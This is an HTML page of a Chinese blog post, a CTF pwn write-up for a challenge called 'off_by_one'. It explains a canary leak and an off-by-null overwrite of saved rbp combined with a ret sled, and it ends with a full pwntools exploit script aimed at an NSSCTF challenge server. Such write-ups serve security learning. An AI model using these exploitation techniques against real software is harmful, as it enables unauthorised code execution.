<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="exp打不通多试试几次 这题感觉是又新又好，有栈上的off_by_null又有点nop_sled的味道开头的puts应该是专门给你泄露canary的通过覆盖canary的\x00让puts误认为canary也是字符串的一部分 12345payload &#x3D; b&amp;#x27;a&amp;#x27; * 0x20 + b&amp;#x27;b&amp;#x27;*0x8sl(payload)ru(&quot;bbbbbbbb">
<meta property="og:type" content="article">
<meta property="og:title" content="off_by_one">
<meta property="og:url" content="http://example.com/2023/09/18/off-by-one/index.html">
<meta property="og:site_name" content="Dvgd">
<meta property="og:description" content="exp打不通多试试几次 这题感觉是又新又好，有栈上的off_by_null又有点nop_sled的味道开头的puts应该是专门给你泄露canary的通过覆盖canary的\x00让puts误认为canary也是字符串的一部分 12345payload &#x3D; b&amp;#x27;a&amp;#x27; * 0x20 + b&amp;#x27;b&amp;#x27;*0x8sl(payload)ru(&quot;bbbbbbbb">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/off-by-one/image-20230918183502833.png">
<meta property="og:image" content="http://example.com/images/off-by-one/image-20230918183513463.png">
<meta property="og:image" content="http://example.com/images/off-by-one/75e171203e.jpg">
<meta property="og:image" content="http://example.com/images/off-by-one/00d165efe6.jpg">
<meta property="article:published_time" content="2023-09-18T10:33:44.000Z">
<meta property="article:modified_time" content="2023-09-18T10:35:33.167Z">
<meta property="article:author" content="Dvgd">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/off-by-one/image-20230918183502833.png">

<link rel="canonical" href="http://example.com/2023/09/18/off-by-one/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>off_by_one | Dvgd</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Dvgd</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Dvgd</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签<span class="badge">2</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="th fa-fw"></i>分类<span class="badge">10</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档<span class="badge">53</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/09/18/off-by-one/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/Dvgd.jpg">
      <meta itemprop="name" content="Dvgd">
      <meta itemprop="description" content="Welcome to my blog.">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Dvgd">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          off_by_one
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-09-18 18:33:44 / 修改时间：18:35:33" itemprop="dateCreated datePublished" datetime="2023-09-18T18:33:44+08:00">2023-09-18</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index"><span itemprop="name">pwn</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><img src="/../images/off-by-one/image-20230918183502833.png" alt="image-20230918183502833"></p>
<p><img src="/../images/off-by-one/image-20230918183513463.png" alt="image-20230918183513463"></p>
<p>exp打不通多试试几次</p>
<p>这题感觉是又新又好，有栈上的off_by_null又有点nop_sled的味道<br>开头的puts应该是专门给你泄露canary的<br>通过覆盖canary的\x00让puts误认为canary也是字符串的一部分</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload = b&#x27;a&#x27; * 0x20 + b&#x27;b&#x27;*0x8</span><br><span class="line">sl(payload)</span><br><span class="line">ru(&quot;bbbbbbbb\x0a&quot;)</span><br><span class="line">canary = u64(p.recv(7).rjust(8,b&#x27;\x00&#x27;))</span><br><span class="line">success(&quot;canary--&gt;&quot; + hex(canary))</span><br></pre></td></tr></table></figure>

<p>进入vuln还需要通过v5的检测，这个v5是一个伪随机数，在gdb里面看一看就知道了。直接输入就可以。注意用p32，因为int四字节</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sea(&quot;key\n\n&quot;,p32(0x02c3))</span><br></pre></td></tr></table></figure>

<p>1</p>
<p>这个vuln就很有意思了，感觉挺花的玩的<br><img src="/../images/off-by-one/75e171203e.jpg" alt="NSSIMAGE"><br>众所周知，read的返回值是你正确输入的字节数，也就是说，整个函数会使得你输入的payload的下一个字节的最后一位改成’\x00’,也就是俗称的off_by_null（说实话第一次看见栈题目中出现off_by_null的）<br>这有什么用呢？在stack题目中，我们一般需要关注的是什么，一个是rbp,一个是ret_addr。因为他俩是可以用来劫持程序流的。<br>题目给与的空间最多只能修改rbp的最后一位，这就足够了。<br>rbp存储的是什么？是当前函数父栈帧的栈底指针位置，而rbp往后一个字节正好就是ret_addr。<br>那么思路就很明显了，通过大量输入ret.让rbp正好修改到ret上面(这个看运气，因为栈地址随机化问题，五次差不多能有一次可以中)，这样等到父栈帧返回时就，可以一直ret,直到获得shell。<br>这是一个成功的例子<br><img src="/../images/off-by-one/00d165efe6.jpg" alt="NSSIMAGE">：<br>刚刚进入vuln的stack，等待输入的情况：此时rbp 位置存储的是0x…ac70,而我们是向0x…acd0(rbp-0x50)位置写入payload,也就是说0x…acd0到0x…ac08都会充满ret<br>而由于off_by_null漏洞，会使得父栈帧的rbp变成0x…ac00,它下一字长就是我们填入的ret,就可以成功获得shell了<br>完整Exp:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">context(os=&#x27;linux&#x27;, arch=&#x27;amd64&#x27;, log_level=&#x27;debug&#x27;)</span><br><span class="line">native = 0</span><br><span class="line"></span><br><span class="line">if native:</span><br><span class="line">    p = process(&#x27;pwn1&#x27;)</span><br><span class="line">    libc = ELF(&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;)</span><br><span class="line">else:</span><br><span class="line">    p = remote(&#x27;node4.anna.nssctf.cn&#x27;,28116)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># libc = ELF(&#x27;&#x27;)</span><br><span class="line"></span><br><span class="line">def debug():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def get_addr():</span><br><span class="line">    return u64(p.recvuntil(b&#x27;\x7f&#x27;)[-6:].ljust(8, b&#x27;\x00&#x27;))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">se = lambda data: p.send(data)</span><br><span class="line">sa = lambda delim, data: p.sendafter(delim, data)</span><br><span class="line">sl = lambda data: p.sendline(data)</span><br><span class="line">sla = lambda delim, data: p.sendlineafter(delim, data)</span><br><span class="line">sea = lambda delim, data: p.sendafter(delim, data)</span><br><span class="line">rc = lambda numb=4096: p.recv(numb)</span><br><span class="line">rl = lambda: p.recvline()</span><br><span class="line">ru = lambda delims: p.recvuntil(delims)</span><br><span class="line"></span><br><span class="line">shell = 0x4007C7</span><br><span class="line">ret = 0x400902</span><br><span class="line">payload = b&#x27;a&#x27; * 0x20 + b&#x27;b&#x27;*0x8</span><br><span class="line">sl(payload)</span><br><span class="line">ru(&quot;bbbbbbbb\x0a&quot;)</span><br><span class="line">canary = u64(p.recv(7).rjust(8,b&#x27;\x00&#x27;))</span><br><span class="line">success(&quot;canary--&gt;&quot; + hex(canary))</span><br><span class="line">sea(&quot;key\n\n&quot;,p32(0x02c3))</span><br><span class="line"></span><br><span class="line">payload = p64(ret) * 10</span><br><span class="line">payload += flat([shell,canary])</span><br><span class="line">sea(&quot;to me\n&quot;,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/09/06/%E5%AE%89%E9%98%B3%E5%B7%A5%E5%AD%A6%E9%99%A2%E6%8A%A2%E8%AF%BE%E8%84%9A%E6%9C%AC/" rel="prev" title="安阳工学院抢课脚本">
      <i class="fa fa-chevron-left"></i> 安阳工学院抢课脚本
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/10/03/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" rel="next" title="命令执行">
      命令执行 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Dvgd"
      src="/images/Dvgd.jpg">
  <p class="site-author-name" itemprop="name">Dvgd</p>
  <div class="site-description" itemprop="description">Welcome to my blog.</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">53</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/yourname" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;yourname" rel="noopener" target="_blank"><i class="github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/yourname" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;yourname" rel="noopener" target="_blank"><i class="weibo fa-fw"></i>Weibo</a>
      </span>
  </div>



      </div>
	   <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1861579836&auto=1&height=66"></iframe>
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Dvgd</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


  <script async src="/js/cursor/fireworks.js"></script>


</body>
</html>
<!-- 引入jQuery -->
<script type="text/javascript" src="//libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>
<!-- 雪花特效2 -->
<script type="text/javascript" src="/js/snow2.js"></script>

<!-- 樱花特效 -->
  
      <script async src="/js/fairyDustCursor.js"></script>
  


